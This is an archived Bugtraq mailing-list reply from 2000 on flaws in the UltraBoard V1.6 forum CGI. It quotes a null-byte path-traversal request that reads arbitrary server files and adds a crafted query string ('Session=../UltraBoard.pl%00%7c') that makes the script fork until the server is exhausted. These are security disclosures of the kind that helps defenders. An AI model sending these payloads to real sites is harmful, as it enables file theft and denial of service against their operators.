[14812] in bugtraq
Re: Fun with UltraBoard V1.6X
daemon@ATHENA.MIT.EDU (Juan M. Bello Rivas)
Sat May 6 17:56:52 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <20000505231056.B2092@itchy.coverlink.es>
Date: Fri, 5 May 2000 23:10:56 +0200
Reply-To: "Juan M. Bello Rivas" <jmbello@ITCHY.COVERLINK.ES>
From: "Juan M. Bello Rivas" <jmbello@ITCHY.COVERLINK.ES>
X-To: rudi carell <rudicarell@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000503091316.99073.qmail@hotmail.com>; from rudi carell on
Wed, May 03, 2000 at 02:13:16AM -0700
Hola,
On Wed, May 03, 2000 at 02:13:16AM -0700, rudi carell wrote:
> found some interesting things in the "old" UltraBoard-Forum scripts
> (UltraBoard V 1.6)
>
> class:Input Validation Error
> remote:Yes
> vulnerable:UltraBoard V1.*
> vendor: www.ultrascripts.com || www.ub2k.com
>
> Description:
> By using the good old NullByte(\000) its possible to open "any" file on the
> webserver(with its permissions) running the "UltraBoard" forum-software.
>
> cgi-script:
> UltraBoard.pl || UltraBoard.cgi
>
> Variables:
> Action=PrintableTopic
> Post=[path_including_".."_to_any_file][***NULLBYTE***]
> Board=[valid_board]
> Idle=10
> Sort=0
> Order=Descend
> Page=0
> Session=
There's even more fun availiable with old versions of ultraboard
(and I think the latest beta of ultraboard 2000 is also vulnerable to this).
You can bring the web server to its knees by issuing a request to
the CGI like this:
QUERY_STRING=Session=../UltraBoard.pl%00%7c
It will start forking instances of the CGI until it eats all the
resources of the machine.
Later.
Juan M. Bello Rivas
--
"Let's suppose you just finished writing `zardoz',
a program to make your head float from vortex to vortex."
From GNU automake documentation.
